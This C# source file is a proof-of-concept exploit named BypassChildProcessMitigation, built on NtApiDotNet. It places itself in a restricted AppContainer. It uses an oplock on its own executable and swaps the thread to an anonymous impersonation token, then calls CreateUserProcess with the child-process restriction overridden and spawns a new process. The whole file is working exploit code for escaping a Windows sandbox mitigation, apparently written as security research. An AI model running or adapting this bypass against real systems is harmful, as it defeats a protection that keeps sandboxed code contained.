﻿using NtApiDotNet;
using NtApiDotNet.Win32;
using System;
using System.Reflection;
using System.Threading;
using System.Windows.Forms;

namespace BypassChildProcessMitigation
{
    class Program
    {
        static NtThread _thread;

        static readonly string FinalExe = @"\??\" + Assembly.GetExecutingAssembly().Location;
        static readonly Sid PackageSid = TokenUtils.GetPackageSidFromName("microsoft.windows.shellexperiencehost_cw5n1h2txyewy");

        static void RunNewProcess()
        {
            _thread = NtThread.OpenCurrent();
            try
            {
                CreateUserProcess process = new CreateUserProcess();
                process.CommandLine = @"cmd abc";
                process.ThreadFlags = ThreadCreateFlags.Suspended;
                process.OverrideRestrictChildProcess = true;
                process.ImagePath = FinalExe;
                process.TerminateOnDispose = true;
                using (var p = process.Start())
                {
                    p.Resume();
                    p.Process.Wait();
                }
            }
            catch (Exception ex)
            {
                MessageBox.Show(ex.ToString());
            }
        }

        static NtToken GetAnonymousToken()
        {
            using (var imp = NtThread.Current.ImpersonateAnonymousToken())
            {
                NtToken token = NtToken.OpenThreadToken();
                Acl default_dacl = token.DefaultDacl;

                default_dacl.AddAccessAllowedAce(GenericAccessRights.GenericAll, KnownSids.World);
                default_dacl.AddAccessAllowedAce(GenericAccessRights.GenericAll, KnownSids.AllApplicationPackages);
                token.SetDefaultDacl(default_dacl);
                return token;
            }
        }

        static bool AccessCheckExecutable(NtToken token)
        {
            using (var file = NtFile.Open(FinalExe, null, FileAccessRights.ReadControl))
            {
                AccessMask desired_access = file.NtType.GenericMapping.MapMask(GenericAccessRights.GenericExecute);
                return NtSecurity.GetAllowedAccess(file.SecurityDescriptor, token, desired_access,
                    file.NtType.GenericMapping) != AccessMask.Empty;
            }
        }

        static NtToken GetLowBoxToken()
        {
            using (var current = NtToken.OpenProcessToken())
            {
                using (var lowbox = current.CreateLowBoxToken(PackageSid))
                {
                    return lowbox.DuplicateToken(SecurityImpersonationLevel.Impersonation);
                }
            }
        }

        static bool AccessCheckExecutable()
        {
            using (NtToken token = GetLowBoxToken())
            {
                return AccessCheckExecutable(token);
            }
        }

        static void Main(string[] args)
        {
            try
            {
                bool in_ac = false;
                using (NtToken token = NtToken.OpenProcessToken())
                {
                    in_ac = token.AppContainer;
                }

                if (!in_ac)
                {
                    if (!AccessCheckExecutable())
                    {
                        throw new Exception("Executable not accessible from an AppContainer.");
                    }
                    Win32ProcessConfig config = new Win32ProcessConfig
                    {
                        CommandLine = Assembly.GetCallingAssembly().Location,
                        RestrictChildProcessCreation = true,
                        AppContainerSid = PackageSid
                    };
                    using (var p = Win32Process.CreateProcess(config))
                    {
                        p.Process.Wait();
                    }
                }
                else if (args.Length == 0)
                {
                    if (!NtProcess.Current.IsChildProcessRestricted)
                    {
                        throw new Exception("Sub process doesn't have child process restriction");
                    }

                    Thread t = new Thread(RunNewProcess)
                    {
                        IsBackground = true
                    };
                    using (NtFile f = NtFile.Open(FinalExe, null, FileAccessRights.ReadControl, FileShareMode.None, FileOpenOptions.NonDirectoryFile))
                    {
                        var oplock = f.OplockExclusiveAsync();
                        t.Start();
                        oplock.Wait();
                        _thread.SetImpersonationToken(GetAnonymousToken());
                    }
                    t.Join();
                }
                else
                {
                    MessageBox.Show($"Hello from PID: {NtProcess.Current.ProcessId}");
                }
            }
            catch (Exception ex)
            {
                MessageBox.Show(ex.Message, "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
            }
        }
    }
}
